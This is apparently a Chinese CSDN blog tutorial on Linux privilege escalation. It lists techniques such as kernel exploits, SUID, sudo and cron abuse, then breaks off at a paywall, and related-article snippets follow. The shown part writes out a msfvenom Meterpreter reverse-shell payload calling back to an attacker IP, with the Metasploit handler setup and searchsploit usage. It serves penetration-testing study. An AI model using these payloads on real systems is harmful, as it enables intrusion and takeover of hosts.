【Web】超级详细的Linux权限提升一站式笔记

最新推荐文章于 2025-07-08 22:00:12 发布
最新推荐文章于 2025-07-08 22:00:12 发布
阅读量1k 收藏 20
点赞数 23
CC 4.0 BY-SA版权
文章标签: 前端 linux 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web13508588635/article/details/144594086

目录

一、Linux内核提权

提权原理

提权环境

提权复现

二、SUID提权

SUID介绍

设置SUID

SUID提权原理

查找SUID文件

提权介绍

find提权

bash提权

vim提权

python提权

三、计划任务提权

提权原理

提权环境

提权步骤

四、环境变量劫持提权

提权原理

提权环境

提权实验

五、SUDO提权

提权原理

提权环境

提权复现

六、利用通配符(WS)进行提权

提权原理

提权环境

提权复现

七、破解明文密码提权

提权原理

提权环境

提权复现

一、Linux内核提权

提权原理

内核提权是利用Linux内核的漏洞进行提权的。内核漏洞进行提权一般包括三个环节:
1、对目标系统进行信息收集,获取到系统内核信息以及版本信息;
2、根据内核版本获取其对应的漏洞以及EXP;
3、使用找到的EXP对目标系统发起攻击,完成提权操作

查看Linux操作系统的内核版本和相关信息

cat /etc/issue 查看ubuntu或者centos的版本
cat /etc/*-release 查看centos版本
uname -a 查看系统全部信息
uname -r 查看内核版本

EXP怎么找呢,可以是用kali去寻找,kali中自带searchsploit命令可以查找EXP

输入 searchsploit -m 50808.c 就会自动复制该文件到当前目录

去互联网搜索该脚本的用法和相关的文档

提权环境

本次实验使用Ubuntu 20.04,内核版本是5.10版本的

提权复现

使用MSF上线机器

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.41.211 LPORT=8888 -f
elf > mshell.elf

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.211
set lport 8888
run

查看操作系统

cat /etc/issue
cat /etc/*-release

查看可以利用的内核版本提

最低0.47元/天 解锁文章

200万优质内容无限畅学
Linux
代码审计
04-13 2630
Linux助手 github项目 cve-2022-0847 面试重要最新漏洞 linux polkit 权限提升 大通杀 一、漏洞概述 1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞(CVE-2021-4034) ,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的ro
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3339
学习sqlmap自动注入
SUID
最新发布
starry_ke
07-08 290
SUID原理与实战案例 SUID(Setowner User ID)是Linux系统中一种特殊文件限,允许用户以文件所有者的限执行程序。当程序具有SUID位时,执行者会临时获得文件所有者的限,这可能导致漏洞。
linux权限提升,Linux权限提升
weixin_33772442的博客
04-29 305
来看passwd命令 (各字段分别为:文件属性字段,文件硬链接数或目录子目录数,文件拥有者,文件拥有者所在的组,文件文件大小(以字节为单位),文件创建月份,文件创建日期,文件创建时间,文件名。)passwd的owner是root,但是普通用户也可以用来修改自己的密码。正常来说,普通用户调用passwd,传递给passwd的限是普通用户的限,但是却修改了密码文件,说明修改密码文件的时候其限是r...
Linux权限提升总结_linux
2401_84968977的博客
05-17 1515
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Linux
qq_54124105的博客
07-14 942
攻击者通过安全漏洞把获取到的低限用户突破限制,至高限的管理员用户,从而获得对整个系统得控制。本地:在一个低限用户下,通过一些条件(应用程序漏洞、系统漏洞等)直接升到系统最高限;远程:攻击者通过漏洞利用程序直接获取远程服务器的限。拥有Webshell,普通用户限;拥有某些软件的账号密码;本地或远程服务器上存在漏洞;拥有漏洞利用工具代码。PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH
B站【千锋】Linux云计算基础视频教程_650集完全入门 课堂笔记
热门推荐
weixin_46860149的博客
06-29 1万+
视频传送门:https://www.bilibili.com/video/BV1wD4y1o7AS 记得三连 文章目录第三章基本限UGO基本限ACL特殊限(了解)第四章进程管理作业管理虚拟文件系统第五章重定向和管道符输出重定向输入重定向发送邮件管道符进程管道tee管道参数传递Xargs第六章存储管理磁盘命名方式磁盘分区方式管理磁盘交换分区管理Swap逻辑卷LVM文件系统文件链接符号链接硬链接(可以理解为文件备份)RAID磁盘列阵(了解)阶段插图第八章文件查找文件打包及压缩第九章RPM包管理认识RPM包
零基础学Linux运维,看这一篇就够了(含30G自学教程笔记
Cloud_Native的博客
07-03 2732
干啥不好,非要做运维,听人劝,吃饱饭,趁年轻,换行吧!
Linux笔记
qq_67226467的博客
03-03 2428
磁盘空间: 系统分区:/根分区《主要用于存放系统文件及程序》。大小至少5G swap 交换分区 《主要用于支持虚拟内容》当物理内存小于8G,交换分区一般为1.5倍物理内存 root 系统引导分区,用于存储系统引导文件,一般分配200m /data 数据存储分区 /usf 其他软件 home 本地个人文件 sudo su 超级用户,井号键,普通管理到超级管理 exit 普通管理,美元键,超级管理到普通管理 hostna...
linux系统
weixin_53639243的博客
04-23 1571
uname -a 显示全部系统信息cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版cat /etc/passwd 所有人都可看//aux都是参数a = show processes for all users 显示所有用户的进程u = display the process's user/owner 显示用户x = also show processes not attached to a terminal 显示无控制终端的进程。
LinuxWEBSHELL一技
06-15
LinuxWEBSHELL一技 用phpshell2.0和配合ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
Linux权限提升
Williamanddog的博客
02-07 1616
SUID是Linux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的 限。如果拥有SUID限,那么就可以利用系统中的二进制文件和工具来进行root。 CVE-2016-5195,即 Dirty COW,俗称「脏牛」漏洞。它是 Linux Kernel 中的条件竞争漏 洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的 越读写,恶意用户可利用此漏洞来获取高限。
LINUX权限提升
weixin_41487048的博客
07-09 106
LINUX内核:CVE-2021-3493登录后复制 atp-cache search linux | grep linux-image1.可以运行这条命令来取查看可以安装的当前软件库的内核版本如果没有的话需要降级登录后复制 atp-get install linux-headers-4.4.0-21-generi...
linux
qq_42307546的博客
04-13 3215
常用命令 uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat -s # 查看网络统计信息 iptables -L #查看防火墙设置 route -n # 查看路由表 ps -ef # 查.
压缩的onenote笔记文件:一站式整理与回顾
通过上述内容的介绍,可以了解到Onenote作为一款功能强大的笔记应用,其供的多种特性和功能对于日常学习、工作和生活的笔记整理具有极大的帮助。同时,了解如何使用压缩和解压技术,也能够有效管理文件和确保数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值